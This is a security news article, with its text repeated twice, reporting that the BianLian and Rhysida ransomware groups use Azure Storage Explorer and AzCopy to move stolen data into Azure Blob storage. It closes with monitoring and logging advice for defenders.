Legal traffic becomes the perfect cover for attacks.
Security researchers at modePUSH recently discovered that ransomware groups such as BianLian and Rhysida are actively using Microsoft Azure Storage Explorer and AzCopy tools to steal data from compromised networks and then store it in Azure Blob cloud storage.
Storage Explorer is a graphical management tool for Azure, while AzCopy is a command utility for migrating data to the cloud at scale. Using these tools, criminals upload stolen data to an Azure Blob container, from where they can easily transfer it to other storage.
modePUSH experts noted that in order to work with Azure Storage Explorer, attackers have to install additional dependencies and update .NET to version 8. This underscores the growing focus on data theft in ransomware operations, where stolen information becomes the main leverage in the subsequent blackmail phase.
While each ransomware group uses its own tools to exfiltrate data, Azure attracts attackers because of its reputation as an enterprise service. Since it is widely used in many companies, its traffic is less likely to be blocked by corporate firewalls and security systems, which greatly simplifies data transfer.
In addition, Azure is highly scalable and performant, which is especially useful when you need to quickly transfer large volumes of files. modePUSH experts also noticed that criminals use multiple instances of Azure Storage Explorer at once to speed up the loading of data into the Blob container.
Researchers found that when using AzCopy and Storage Explorer, attackers enable the standard "Info" logging level, which stores information about operations in a log file. This file can help incident responders quickly identify what data has been stolen and what files may have been downloaded to victims' devices.
To protect yourself, we recommend monitoring AzCopy progress, monitoring outbound traffic to Azure Blob Storage points, and setting alerts when unusual copying or file access activity is detected on key servers. Organizations that are already using Azure should enable the option to automatically log out of the application when it is closed to prevent attackers from using active sessions to steal data.
Source
Security researchers at modePUSH recently discovered that ransomware groups such as BianLian and Rhysida are actively using Microsoft Azure Storage Explorer and AzCopy tools to steal data from compromised networks and then store it in Azure Blob cloud storage.
Storage Explorer is a graphical management tool for Azure, while AzCopy is a command utility for migrating data to the cloud at scale. Using these tools, criminals upload stolen data to an Azure Blob container, from where they can easily transfer it to other storage.
modePUSH experts noted that in order to work with Azure Storage Explorer, attackers have to install additional dependencies and update .NET to version 8. This underscores the growing focus on data theft in ransomware operations, where stolen information becomes the main leverage in the subsequent blackmail phase.
While each ransomware group uses its own tools to exfiltrate data, Azure attracts attackers because of its reputation as an enterprise service. Since it is widely used in many companies, its traffic is less likely to be blocked by corporate firewalls and security systems, which greatly simplifies data transfer.
In addition, Azure is highly scalable and performant, which is especially useful when you need to quickly transfer large volumes of files. modePUSH experts also noticed that criminals use multiple instances of Azure Storage Explorer at once to speed up the loading of data into the Blob container.
Researchers found that when using AzCopy and Storage Explorer, attackers enable the standard "Info" logging level, which stores information about operations in a log file. This file can help incident responders quickly identify what data has been stolen and what files may have been downloaded to victims' devices.
To protect yourself, we recommend monitoring AzCopy progress, monitoring outbound traffic to Azure Blob Storage points, and setting alerts when unusual copying or file access activity is detected on key servers. Organizations that are already using Azure should enable the option to automatically log out of the application when it is closed to prevent attackers from using active sessions to steal data.
Source
